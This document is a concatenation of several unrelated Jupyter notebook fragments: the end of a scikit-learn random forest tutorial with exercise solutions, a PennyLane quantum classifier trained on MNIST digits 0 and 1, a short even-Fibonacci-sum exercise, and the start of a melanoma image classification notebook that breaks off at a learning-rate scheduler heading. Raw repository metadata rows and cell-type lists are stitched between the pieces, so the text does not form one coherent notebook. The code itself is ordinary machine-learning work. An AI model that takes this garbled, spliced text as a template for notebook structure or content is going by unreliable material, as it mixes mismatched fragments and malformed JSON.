"**Task**: Now let's see how the forest came to that conclusion. Compute the average of the predictions obtained from every tree. \n\nCompare that to the prediction obtained directly from the random forest (`rf.predict(X_test)`). They should be the same.",
"_____no_output_____"
]
],
[
[
"y_pred = ...\nprint(f\"{x} => {y_pred}$\")",
"_____no_output_____"
]
],
[
[
"<details>\n<summary>Solution</summary>\n<pre>\ny_pred = np.mean([t.predict(x) for t in rf.estimators_])\nprint(f\"{x} => {y_pred}$\")\n</pre>\n</details>",
"_____no_output_____"
],
[
"**Task**: Compute the standard deviation of the tree estimates and print that out.",
"_____no_output_____"
],
[
"<details>\n<summary>Solution</summary>\n<pre>\nnp.std([t.predict(x) for t in rf.estimators_])\n</pre>\n</details>",
"_____no_output_____"
],
[
"The lower the standard deviation, the more tightly grouped the predictions were, which means we should have more confidence in our answer. \n\nDifferent records will often have different standard deviations, which means we could have different levels of confidence in the various answers. This might be helpful to a bank for example that wanted to not only predict whether to give loans, but how confident the model was.",
"_____no_output_____"
],
[
"## Altering bootstrap size\n\n**This no longer works with latest versions of scikit-learn... and the feature is not yet implemented by them* See [related github issue](https://github.com/scikit-learn/scikit-learn/issues/11993). Ah [this new features](https://github.com/scikit-learn/scikit-learn/pull/14682) covers it for trees. \"Adds a max_samples kwarg to forest ensembles that limits the size of the bootstrap samples used to train each estimator.\"",
"_____no_output_____"
]
],
[
[
"NO LONGER NEEDED\ndef jeremy_trick_RF_sample_size(n):\n if LooseVersion(sklearn.__version__) >= LooseVersion(\"0.24\"):\n forest._generate_sample_indices = \\\n (lambda rs, n_samples, _:\n forest.check_random_state(rs).randint(0, n_samples, n))\n else:\n forest._generate_sample_indices = \\\n (lambda rs, n_samples: forest.check_random_state(rs).randint(0, n_samples, n))",
"_____no_output_____"
]
],
[
[
"X, y = rent()\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.20)",
"_____no_output_____"
]
],
[
[
"**Task**: There are about 38,000 training records, change that to 19,000 and check the accuracy again.",
"_____no_output_____"
]
],
[
[
"rf = RandomForestRegressor(n_estimators=200) # don't compute in parallel so we can see timing\n%time rf.fit(X_train, y_train)\nmae_train = mean_absolute_error(y_train, rf.predict(X_train))\nmae = mean_absolute_error(y_test, rf.predict(X_test))\nprint(f\"MAE train {mae_train:.1f}$, test {mae:.1f}$\")",
"CPU times: user 8.64 s, sys: 235 ms, total: 8.88 s\nWall time: 8.95 s\nMAE train 184.2$, test 291.1$\n"
],
[
"rf = RandomForestRegressor(n_estimators=200, max_samples=1/2)\n%time rf.fit(X_train, y_train)\nmae_train = mean_absolute_error(y_train, rf.predict(X_train))\nmae = mean_absolute_error(y_test, rf.predict(X_test))\nprint(f\"MAE train {mae_train:.1f}$, test {mae:.1f}$\")",
"CPU times: user 5.75 s, sys: 122 ms, total: 5.88 s\nWall time: 5.96 s\nMAE train 226.7$, test 307.1$\n"
]
],
[
[
"It's a bit less accurate, but it's faster.",
"_____no_output_____"
],
[
"**Q.** Why is it less accurate?",
"_____no_output_____"
],
[
"<details>\n<summary>Solution</summary>\nEach tree is seeing less of the data set during training.\n</details>",
"_____no_output_____"
],
[
"**Task**: Turn off bootstrapping by adding `bootstrap=False` to the constructor of the model. This means that it will subsample rather than bootstrap. Remember that bootstrapping gets about two thirds of the data because of replacement.",
"_____no_output_____"
]
],
[
[
"rf = ...\nprint(f\"MAE train {mae_train:.1f}$, test {mae:.1f}$\")",
"_____no_output_____"
]
],
[
[
"<details>\n<summary>Solution</summary>\n<pre>\nrf = RandomForestRegressor(n_estimators=200, n_jobs=-1, bootstrap=False)\n%time rf.fit(X_train, y_train)\nmae_train = mean_absolute_error(y_train, rf.predict(X_train))\nmae = mean_absolute_error(y_test, rf.predict(X_test))\nprint(f\"MAE train {mae_train:.1f}$, test {mae:.1f}$\")\n</pre>\n</details>",
"_____no_output_____"
],
[
"That brings the accuracy back up a little bit for the test set but very much so for the training MAE score.",
"_____no_output_____"
],
[
"**Task**: Drop that size to one third of the training records then retrain and test.",
"_____no_output_____"
]
],
[
[
"rf = RandomForestRegressor(n_estimators=200, max_samples=1/3, n_jobs=-1)\n%time rf.fit(X_train, y_train)\nmae_train = mean_absolute_error(y_train, rf.predict(X_train))\nmae = mean_absolute_error(y_test, rf.predict(X_test))\nprint(f\"MAE train {mae_train:.1f}$, test {mae:.1f}$\")",
"_____no_output_____"
]
],
[
[
"Mine is twice as fast as the full bootstrap but continues to have very tight variance because of the number of trees. The accuracy is lower, however, about what we get for the usual random forest with two trees.",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"raw",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown"
] | [
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"raw"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
]
] |
cb04e28304749e37ecd55e888497c1c9c90f6676 | 21,945 | ipynb | Jupyter Notebook | PennyLane/Data Reuploading Classifier/Conv + DRC Keras MNIST (best).ipynb | Graciaira/quantum_image_classifier | 1e6a8ec93f51dcbfd63c2e652be5d1fcbce283ce | [
"MIT"
] | 1 | 2021-06-08T12:32:09.000Z | 2021-06-08T12:32:09.000Z | PennyLane/Data Reuploading Classifier/Conv + DRC Keras MNIST (best).ipynb | Graciaira/quantum_image_classifier | 1e6a8ec93f51dcbfd63c2e652be5d1fcbce283ce | [
"MIT"
] | null | null | null | PennyLane/Data Reuploading Classifier/Conv + DRC Keras MNIST (best).ipynb | Graciaira/quantum_image_classifier | 1e6a8ec93f51dcbfd63c2e652be5d1fcbce283ce | [
"MIT"
] | null | null | null | 28.611473 | 139 | 0.529779 | [
[
[
"# Mount Google Drive\nfrom google.colab import drive # import drive from google colab\n \nROOT = \"/content/drive\" # default location for the drive\nprint(ROOT) # print content of ROOT (Optional)\n \ndrive.mount(ROOT) # we mount the google drive at /content/drive",
"/content/drive\nMounted at /content/drive\n"
],
[
"!pip install pennylane\nfrom IPython.display import clear_output\nclear_output()",
"_____no_output_____"
],
[
"import os\n\ndef restart_runtime():\n os.kill(os.getpid(), 9)\nrestart_runtime()",
"_____no_output_____"
],
[
"# %matplotlib inline\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.axes_grid1 import make_axes_locatable\n\nimport numpy as np",
"_____no_output_____"
]
],
[
[
"# Loading Raw Data",
"_____no_output_____"
]
],
[
[
"import tensorflow as tf\n\n(x_train, y_train), (x_test, y_test) = tf.keras.datasets.mnist.load_data()\n\nx_train = x_train[:, 0:27, 0:27]\nx_test = x_test[:, 0:27, 0:27]",
"_____no_output_____"
],
[
"x_train_flatten = x_train.reshape(x_train.shape[0], x_train.shape[1]*x_train.shape[2])/255.0\nx_test_flatten = x_test.reshape(x_test.shape[0], x_test.shape[1]*x_test.shape[2])/255.0",
"_____no_output_____"
],
[
"print(x_train_flatten.shape, y_train.shape)\nprint(x_test_flatten.shape, y_test.shape)",
"(60000, 729) (60000,)\n(10000, 729) (10000,)\n"
],
[
"x_train_0 = x_train_flatten[y_train == 0]\nx_train_1 = x_train_flatten[y_train == 1]\nx_train_2 = x_train_flatten[y_train == 2]\nx_train_3 = x_train_flatten[y_train == 3]\nx_train_4 = x_train_flatten[y_train == 4]\nx_train_5 = x_train_flatten[y_train == 5]\nx_train_6 = x_train_flatten[y_train == 6]\nx_train_7 = x_train_flatten[y_train == 7]\nx_train_8 = x_train_flatten[y_train == 8]\nx_train_9 = x_train_flatten[y_train == 9]\n\nx_train_list = [x_train_0, x_train_1, x_train_2, x_train_3, x_train_4, x_train_5, x_train_6, x_train_7, x_train_8, x_train_9]\n\nprint(x_train_0.shape)\nprint(x_train_1.shape)\nprint(x_train_2.shape)\nprint(x_train_3.shape)\nprint(x_train_4.shape)\nprint(x_train_5.shape)\nprint(x_train_6.shape)\nprint(x_train_7.shape)\nprint(x_train_8.shape)\nprint(x_train_9.shape)",
"(5923, 729)\n(6742, 729)\n(5958, 729)\n(6131, 729)\n(5842, 729)\n(5421, 729)\n(5918, 729)\n(6265, 729)\n(5851, 729)\n(5949, 729)\n"
],
[
"x_test_0 = x_test_flatten[y_test == 0]\nx_test_1 = x_test_flatten[y_test == 1]\nx_test_2 = x_test_flatten[y_test == 2]\nx_test_3 = x_test_flatten[y_test == 3]\nx_test_4 = x_test_flatten[y_test == 4]\nx_test_5 = x_test_flatten[y_test == 5]\nx_test_6 = x_test_flatten[y_test == 6]\nx_test_7 = x_test_flatten[y_test == 7]\nx_test_8 = x_test_flatten[y_test == 8]\nx_test_9 = x_test_flatten[y_test == 9]\n\nx_test_list = [x_test_0, x_test_1, x_test_2, x_test_3, x_test_4, x_test_5, x_test_6, x_test_7, x_test_8, x_test_9]\n\nprint(x_test_0.shape)\nprint(x_test_1.shape)\nprint(x_test_2.shape)\nprint(x_test_3.shape)\nprint(x_test_4.shape)\nprint(x_test_5.shape)\nprint(x_test_6.shape)\nprint(x_test_7.shape)\nprint(x_test_8.shape)\nprint(x_test_9.shape)",
"(980, 729)\n(1135, 729)\n(1032, 729)\n(1010, 729)\n(982, 729)\n(892, 729)\n(958, 729)\n(1028, 729)\n(974, 729)\n(1009, 729)\n"
]
],
[
[
"# Selecting the dataset\n\nOutput: X_train, Y_train, X_test, Y_test",
"_____no_output_____"
]
],
[
[
"X_train = np.concatenate((x_train_list[0][:200, :], x_train_list[1][:200, :]), axis=0)\nY_train = np.zeros((X_train.shape[0],), dtype=int)\nY_train[200:] += 1\n\nX_train.shape, Y_train.shape",
"_____no_output_____"
],
[
"X_test = np.concatenate((x_test_list[0][:500, :], x_test_list[1][:500, :]), axis=0)\nY_test = np.zeros((X_test.shape[0],), dtype=int)\nY_test[500:] += 1\n\nX_test.shape, Y_test.shape",
"_____no_output_____"
]
],
[
[
"# Dataset Preprocessing",
"_____no_output_____"
]
],
[
[
"X_train = X_train.reshape(X_train.shape[0], 27, 27, 1)\nX_test = X_test.reshape(X_test.shape[0], 27, 27, 1)\n\nX_train.shape, X_test.shape",
"_____no_output_____"
]
],
[
[
"# Quantum",
"_____no_output_____"
]
],
[
[
"import pennylane as qml\nfrom pennylane import numpy as np\nfrom pennylane.optimize import AdamOptimizer, GradientDescentOptimizer\n\nqml.enable_tape()\n\nfrom tensorflow.keras.utils import to_categorical\n\n# Set a random seed\nnp.random.seed(2020)",
"_____no_output_____"
],
[
"# Define output labels as quantum state vectors\ndef density_matrix(state):\n \"\"\"Calculates the density matrix representation of a state.\n\n Args:\n state (array[complex]): array representing a quantum state vector\n\n Returns:\n dm: (array[complex]): array representing the density matrix\n \"\"\"\n return state * np.conj(state).T\n\n\nlabel_0 = [[1], [0]]\nlabel_1 = [[0], [1]]\nstate_labels = [label_0, label_1]",
"_____no_output_____"
],
[
"n_qubits = 2\ndev = qml.device(\"default.qubit\", wires=n_qubits)\n\n\[email protected](dev)\ndef qcircuit(params, inputs):\n \"\"\"A variational quantum circuit representing the DRC.\n\n Args:\n params (array[float]): array of parameters\n inputs = [x, y]\n x (array[float]): 1-d input vector\n y (array[float]): single output state density matrix\n\n Returns:\n float: fidelity between output state and input\n \"\"\"\n \n # layer iteration\n for l in range(len(params[0])):\n # qubit iteration\n for q in range(n_qubits):\n # gate iteration\n for g in range(int(len(inputs)/3)):\n qml.Rot(*(params[0][l][3*g:3*(g+1)] * inputs[3*g:3*(g+1)] + params[1][l][3*g:3*(g+1)]), wires=q)\n \n return [qml.expval(qml.Hermitian(density_matrix(state_labels[i]), wires=[i])) for i in range(n_qubits)]\n",
"_____no_output_____"
],
[
"class class_weights(tf.keras.layers.Layer):\n def __init__(self):\n super(class_weights, self).__init__()\n w_init = tf.random_normal_initializer()\n self.w = tf.Variable(\n initial_value=w_init(shape=(1, 2), dtype=\"float32\"),\n trainable=True,\n )\n\n def call(self, inputs):\n return (inputs * self.w)",
"_____no_output_____"
],
[
"X = tf.keras.Input(shape=(27,27,1))\n\nconv_layer_1 = tf.keras.layers.Conv2D(filters=1, kernel_size=[3,3], strides=[2,2], name='Conv_Layer_1')(X)\nconv_layer_2 = tf.keras.layers.Conv2D(filters=1, kernel_size=[3,3], strides=[2,2], name='Conv_Layer_2')(conv_layer_1)\nmax__pool_layer = tf.keras.layers.MaxPooling2D(pool_size=(2, 2), strides=None, name='Max_Pool_Layer')(conv_layer_2)\nreshapor_layer = tf.keras.layers.Reshape((9,), name='Reshapor_Layer')(max__pool_layer)\n\nqlayer = qml.qnn.KerasLayer(qcircuit, {\"params\": (2, 1, 9)}, output_dim=2, name='Quantum_Layer')(reshapor_layer)\n\nclass_weights_layer = class_weights()(qlayer)\n\nmodel = tf.keras.Model(inputs=X, outputs=class_weights_layer, name='Conv DRC')",
"_____no_output_____"
],
[
"model(X_train[0:32])",
"_____no_output_____"
],
[
"model.summary()",
"Model: \"Conv DRC\"\n_________________________________________________________________\nLayer (type) Output Shape Param # \n=================================================================\ninput_50 (InputLayer) [(None, 27, 27, 1)] 0 \n_________________________________________________________________\nConv_Layer_1 (Conv2D) (None, 13, 13, 1) 10 \n_________________________________________________________________\nConv_Layer_2 (Conv2D) (None, 6, 6, 1) 10 \n_________________________________________________________________\nMax_Pool_Layer (MaxPooling2D (None, 3, 3, 1) 0 \n_________________________________________________________________\nReshapor_Layer (Reshape) (None, 9) 0 \n_________________________________________________________________\nQuantum_Layer (KerasLayer) (None, 2) 18 \n_________________________________________________________________\nclass_weights_15 (class_weig (None, 2) 2 \n=================================================================\nTotal params: 40\nTrainable params: 40\nNon-trainable params: 0\n_________________________________________________________________\n"
],
[
"opt = tf.keras.optimizers.Adam(learning_rate=0.1)\nmodel.compile(opt, loss=\"mse\", metrics=[\"accuracy\"])",
"_____no_output_____"
],
[
"model.fit(X_train, to_categorical(Y_train), epochs=6, batch_size=32, validation_data=(X_test, to_categorical(Y_test)), verbose=1)",
"Epoch 1/6\n13/13 [==============================] - 47s 4s/step - loss: 0.3558 - accuracy: 0.6175 - val_loss: 0.0762 - val_accuracy: 0.9180\nEpoch 2/6\n13/13 [==============================] - 47s 4s/step - loss: 0.0839 - accuracy: 0.9218 - val_loss: 0.0904 - val_accuracy: 0.9080\nEpoch 3/6\n13/13 [==============================] - 48s 4s/step - loss: 0.0723 - accuracy: 0.9334 - val_loss: 0.0534 - val_accuracy: 0.9560\nEpoch 4/6\n13/13 [==============================] - 47s 4s/step - loss: 0.0401 - accuracy: 0.9720 - val_loss: 0.0455 - val_accuracy: 0.9570\nEpoch 5/6\n13/13 [==============================] - 47s 4s/step - loss: 0.0377 - accuracy: 0.9781 - val_loss: 0.0453 - val_accuracy: 0.9640\nEpoch 6/6\n13/13 [==============================] - 47s 4s/step - loss: 0.0383 - accuracy: 0.9716 - val_loss: 0.0432 - val_accuracy: 0.9600\n"
],
[
"predict_test = model.predict(X_test)",
"_____no_output_____"
]
]
] | [
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
cb04f9d49e22e8b0b99de6685137ce1ec73afa0c | 1,124 | ipynb | Jupyter Notebook | Lecture 2 Conditionals loops and Functions/Practice/Even Fibonacci Numbers-checkpoint.ipynb | Paraskk/Data-Science-and-Machine-Leaning- | b29223a82ea39f7860d3729d7297bac2a4724c8f | [
"MIT"
] | 1 | 2021-12-13T12:37:25.000Z | 2021-12-13T12:37:25.000Z | Lecture 2 Conditionals loops and Functions/Practice/Even Fibonacci Numbers-checkpoint.ipynb | Udaysonu/Coding-Ninjas-Machine-Learning | 4fd6b4b62f07b28dbe80c084ad820630f2351a76 | [
"MIT"
] | null | null | null | Lecture 2 Conditionals loops and Functions/Practice/Even Fibonacci Numbers-checkpoint.ipynb | Udaysonu/Coding-Ninjas-Machine-Learning | 4fd6b4b62f07b28dbe80c084ad820630f2351a76 | [
"MIT"
] | 2 | 2020-08-27T13:03:33.000Z | 2020-09-01T17:34:23.000Z | 19.37931 | 210 | 0.508897 | [
[
[
"## Given a number N find the sum of all the even valued terms in the fibonacci sequence less than or equal to N. Try generating only even fibonacci numbers instead of iterating over all Fibonacci numbers.",
"_____no_output_____"
]
],
[
[
"n=int(input())\na,b=1,1\nsum=0\nwhile a<=n:\n if a%2==0:\n sum+=a\n a,b=b,a+b\nprint(sum)",
"4\n2\n"
]
]
] | [
"markdown",
"code"
] | [
[
"markdown"
],
[
"code"
]
] |
cb050b54cf2f4a5b325876512c49554c6a289672 | 955,835 | ipynb | Jupyter Notebook | Model backlog/Train/31-melanoma-5fold-resnet18-cosine-decay-wr.ipynb | dimitreOliveira/melanoma-classification | e366a645b872f035a34fd2df5ee96fa8a1615ce1 | [
"MIT"
] | 10 | 2020-08-19T02:54:32.000Z | 2021-11-14T16:04:08.000Z | Model backlog/Train/31-melanoma-5fold-resnet18-cosine-decay-wr.ipynb | dimitreOliveira/melanoma-classification | e366a645b872f035a34fd2df5ee96fa8a1615ce1 | [
"MIT"
] | null | null | null | Model backlog/Train/31-melanoma-5fold-resnet18-cosine-decay-wr.ipynb | dimitreOliveira/melanoma-classification | e366a645b872f035a34fd2df5ee96fa8a1615ce1 | [
"MIT"
] | 5 | 2020-09-16T14:04:36.000Z | 2021-03-05T12:44:44.000Z | 286.951366 | 249,176 | 0.889544 | [
[
[
"## Dependencies",
"_____no_output_____"
]
],
[
[
"# !pip install --quiet efficientnet\n!pip install --quiet image-classifiers",
"_____no_output_____"
],
[
"import warnings, json, re, glob, math\nfrom scripts_step_lr_schedulers import *\nfrom melanoma_utility_scripts import *\nfrom kaggle_datasets import KaggleDatasets\nfrom sklearn.model_selection import KFold\nimport tensorflow.keras.layers as L\nimport tensorflow.keras.backend as K\nfrom tensorflow.keras.callbacks import EarlyStopping, ModelCheckpoint\nfrom tensorflow.keras import optimizers, layers, metrics, losses, Model\n# import efficientnet.tfkeras as efn\nfrom classification_models.tfkeras import Classifiers\nimport tensorflow_addons as tfa\n\nSEED = 0\nseed_everything(SEED)\nwarnings.filterwarnings(\"ignore\")",
"_____no_output_____"
]
],
[
[
"## TPU configuration",
"_____no_output_____"
]
],
[
[
"strategy, tpu = set_up_strategy()\nprint(\"REPLICAS: \", strategy.num_replicas_in_sync)\nAUTO = tf.data.experimental.AUTOTUNE",
"REPLICAS: 1\n"
]
],
[
[
"# Model parameters",
"_____no_output_____"
]
],
[
[
"dataset_path = 'melanoma-256x256'\n\nconfig = {\n \"HEIGHT\": 256,\n \"WIDTH\": 256,\n \"CHANNELS\": 3,\n \"BATCH_SIZE\": 64,\n \"EPOCHS\": 20,\n \"LEARNING_RATE\": 3e-4, \n \"ES_PATIENCE\": 5,\n \"N_FOLDS\": 5,\n \"BASE_MODEL_PATH\": 'imagenet',\n \"DATASET_PATH\": dataset_path\n}\n\nwith open('config.json', 'w') as json_file:\n json.dump(json.loads(json.dumps(config)), json_file)\n \nconfig",
"_____no_output_____"
]
],
[
[
"# Load data",
"_____no_output_____"
]
],
[
[
"database_base_path = '/kaggle/input/siim-isic-melanoma-classification/'\nk_fold = pd.read_csv(database_base_path + 'train.csv')\ntest = pd.read_csv(database_base_path + 'test.csv')\n\nprint('Train samples: %d' % len(k_fold))\ndisplay(k_fold.head())\nprint(f'Test samples: {len(test)}')\ndisplay(test.head())\n\nGCS_PATH = KaggleDatasets().get_gcs_path(dataset_path)\nTRAINING_FILENAMES = tf.io.gfile.glob(GCS_PATH + '/train*.tfrec')\nTEST_FILENAMES = tf.io.gfile.glob(GCS_PATH + '/test*.tfrec')",
"Train samples: 33126\n"
]
],
[
[
"# Augmentations",
"_____no_output_____"
]
],
[
[
"def data_augment(image, label):\n p_spatial = tf.random.uniform([1], minval=0, maxval=1, dtype='float32')\n p_spatial2 = tf.random.uniform([1], minval=0, maxval=1, dtype='float32')\n p_rotate = tf.random.uniform([1], minval=0, maxval=1, dtype='float32')\n p_crop = tf.random.uniform([1], minval=0, maxval=1, dtype='float32')\n \n ### Spatial-level transforms\n if p_spatial >= .2: # flips\n image['input_image'] = tf.image.random_flip_left_right(image['input_image'])\n image['input_image'] = tf.image.random_flip_up_down(image['input_image'])\n if p_spatial >= .7:\n image['input_image'] = tf.image.transpose(image['input_image'])\n \n if p_rotate >= .8: # rotate 270º\n image['input_image'] = tf.image.rot90(image['input_image'], k=3)\n elif p_rotate >= .6: # rotate 180º\n image['input_image'] = tf.image.rot90(image['input_image'], k=2)\n elif p_rotate >= .4: # rotate 90º\n image['input_image'] = tf.image.rot90(image['input_image'], k=1)\n \n if p_spatial2 >= .7: # random rotation range 0º to 45º\n image['input_image'] = transform_rotation(image['input_image'], config['HEIGHT'])\n \n if p_crop >= .6: # crops\n if p_crop >= .95:\n image['input_image'] = tf.image.random_crop(image['input_image'], size=[int(config['HEIGHT']*.7), int(config['WIDTH']*.7), config['CHANNELS']])\n elif p_crop >= .85:\n image['input_image'] = tf.image.random_crop(image['input_image'], size=[int(config['HEIGHT']*.8), int(config['WIDTH']*.8), config['CHANNELS']])\n elif p_crop >= .7:\n image['input_image'] = tf.image.random_crop(image['input_image'], size=[int(config['HEIGHT']*.9), int(config['WIDTH']*.9), config['CHANNELS']])\n else:\n image['input_image'] = tf.image.central_crop(image['input_image'], central_fraction=.6)\n image['input_image'] = tf.image.resize(image['input_image'], size=[config['HEIGHT'], config['WIDTH']])\n\n return image, label",
"_____no_output_____"
]
],
[
[
"## Auxiliary functions",
"_____no_output_____"
]
],
[
[
"# Datasets utility functions\ndef read_labeled_tfrecord(example, height=config['HEIGHT'], width=config['WIDTH'], channels=config['CHANNELS']):\n example = tf.io.parse_single_example(example, LABELED_TFREC_FORMAT)\n image = decode_image(example['image'], height, width, channels)\n label = tf.cast(example['target'], tf.float32)\n # meta features\n data = {}\n data['patient_id'] = tf.cast(example['patient_id'], tf.int32)\n data['sex'] = tf.cast(example['sex'], tf.int32)\n data['age_approx'] = tf.cast(example['age_approx'], tf.int32)\n data['anatom_site_general_challenge'] = tf.cast(tf.one_hot(example['anatom_site_general_challenge'], 7), tf.int32)\n data['diagnosis'] = tf.cast(tf.one_hot(example['diagnosis'], 10), tf.int32)\n \n return {'input_image': image, 'input_meta': data}, label # returns a dataset of (image, data, label)\n\ndef read_labeled_tfrecord_eval(example, height=config['HEIGHT'], width=config['WIDTH'], channels=config['CHANNELS']):\n example = tf.io.parse_single_example(example, LABELED_TFREC_FORMAT)\n image = decode_image(example['image'], height, width, channels)\n label = tf.cast(example['target'], tf.float32)\n image_name = example['image_name']\n # meta features\n data = {}\n data['patient_id'] = tf.cast(example['patient_id'], tf.int32)\n data['sex'] = tf.cast(example['sex'], tf.int32)\n data['age_approx'] = tf.cast(example['age_approx'], tf.int32)\n data['anatom_site_general_challenge'] = tf.cast(tf.one_hot(example['anatom_site_general_challenge'], 7), tf.int32)\n data['diagnosis'] = tf.cast(tf.one_hot(example['diagnosis'], 10), tf.int32)\n \n return {'input_image': image, 'input_meta': data}, label, image_name # returns a dataset of (image, data, label, image_name)\n\ndef load_dataset(filenames, ordered=False, buffer_size=-1):\n ignore_order = tf.data.Options()\n if not ordered:\n ignore_order.experimental_deterministic = False # disable order, increase speed\n\n dataset = tf.data.TFRecordDataset(filenames, num_parallel_reads=buffer_size) # automatically interleaves reads from multiple files\n dataset = dataset.with_options(ignore_order) # uses data as soon as it streams in, rather than in its original order\n dataset = dataset.map(read_labeled_tfrecord, num_parallel_calls=buffer_size)\n \n return dataset # returns a dataset of (image, data, label)\n\ndef load_dataset_eval(filenames, buffer_size=-1):\n dataset = tf.data.TFRecordDataset(filenames, num_parallel_reads=buffer_size) # automatically interleaves reads from multiple files\n dataset = dataset.map(read_labeled_tfrecord_eval, num_parallel_calls=buffer_size)\n \n return dataset # returns a dataset of (image, data, label, image_name)\n\ndef get_training_dataset(filenames, batch_size, buffer_size=-1):\n dataset = load_dataset(filenames, ordered=False, buffer_size=buffer_size)\n dataset = dataset.map(data_augment, num_parallel_calls=AUTO)\n dataset = dataset.repeat() # the training dataset must repeat for several epochs\n dataset = dataset.shuffle(2048)\n dataset = dataset.batch(batch_size, drop_remainder=True) # slighly faster with fixed tensor sizes\n dataset = dataset.prefetch(buffer_size) # prefetch next batch while training (autotune prefetch buffer size)\n return dataset\n\ndef get_validation_dataset(filenames, ordered=True, repeated=False, batch_size=32, buffer_size=-1):\n dataset = load_dataset(filenames, ordered=ordered, buffer_size=buffer_size)\n if repeated:\n dataset = dataset.repeat()\n dataset = dataset.shuffle(2048)\n dataset = dataset.batch(batch_size, drop_remainder=repeated)\n dataset = dataset.prefetch(buffer_size)\n return dataset\n\ndef get_eval_dataset(filenames, batch_size=32, buffer_size=-1):\n dataset = load_dataset_eval(filenames, buffer_size=buffer_size)\n dataset = dataset.batch(batch_size, drop_remainder=False)\n dataset = dataset.prefetch(buffer_size)\n return dataset\n\n# Test function\ndef read_unlabeled_tfrecord(example, height=config['HEIGHT'], width=config['WIDTH'], channels=config['CHANNELS']):\n example = tf.io.parse_single_example(example, UNLABELED_TFREC_FORMAT)\n image = decode_image(example['image'], height, width, channels)\n image_name = example['image_name']\n # meta features\n data = {}\n data['patient_id'] = tf.cast(example['patient_id'], tf.int32)\n data['sex'] = tf.cast(example['sex'], tf.int32)\n data['age_approx'] = tf.cast(example['age_approx'], tf.int32)\n data['anatom_site_general_challenge'] = tf.cast(tf.one_hot(example['anatom_site_general_challenge'], 7), tf.int32)\n \n return {'input_image': image, 'input_tabular': data}, image_name # returns a dataset of (image, data, image_name)\n\ndef load_dataset_test(filenames, buffer_size=-1):\n dataset = tf.data.TFRecordDataset(filenames, num_parallel_reads=buffer_size) # automatically interleaves reads from multiple files\n dataset = dataset.map(read_unlabeled_tfrecord, num_parallel_calls=buffer_size)\n # returns a dataset of (image, data, label, image_name) pairs if labeled=True or (image, data, image_name) pairs if labeled=False\n return dataset\n\ndef get_test_dataset(filenames, batch_size=32, buffer_size=-1):\n dataset = load_dataset_test(filenames, buffer_size=buffer_size)\n dataset = dataset.batch(batch_size, drop_remainder=False)\n dataset = dataset.prefetch(buffer_size)\n return dataset\n\n# Advanced augmentations\ndef transform_rotation(image, height):\n # input image - is one image of size [dim,dim,3] not a batch of [b,dim,dim,3]\n # output - image randomly rotated\n DIM = height\n XDIM = DIM%2 #fix for size 331\n \n rotation = 45. * tf.random.uniform([1], minval=0, maxval=1, dtype='float32')\n # CONVERT DEGREES TO RADIANS\n rotation = math.pi * rotation / 180.\n \n # ROTATION MATRIX\n c1 = tf.math.cos(rotation)\n s1 = tf.math.sin(rotation)\n one = tf.constant([1] ,dtype='float32')\n zero = tf.constant([0], dtype='float32')\n rotation_matrix = tf.reshape( tf.concat([c1,s1,zero, -s1,c1,zero, zero,zero,one],axis=0), [3, 3] )\n\n # LIST DESTINATION PIXEL INDICES\n x = tf.repeat( tf.range(DIM//2,-DIM//2,-1), DIM )\n y = tf.tile( tf.range(-DIM//2,DIM//2),[DIM] )\n z = tf.ones([DIM*DIM],dtype='int32')\n idx = tf.stack( [x,y,z] )\n \n # ROTATE DESTINATION PIXELS ONTO ORIGIN PIXELS\n idx2 = K.dot(rotation_matrix,tf.cast(idx,dtype='float32'))\n idx2 = K.cast(idx2,dtype='int32')\n idx2 = K.clip(idx2,-DIM//2+XDIM+1,DIM//2)\n \n # FIND ORIGIN PIXEL VALUES \n idx3 = tf.stack( [DIM//2-idx2[0,], DIM//2-1+idx2[1,]] )\n d = tf.gather_nd(image, tf.transpose(idx3))\n \n return tf.reshape(d,[DIM, DIM, 3])",
"_____no_output_____"
]
],
[
[
"## Learning rate scheduler",
"_____no_output_____"
]
],
[
[
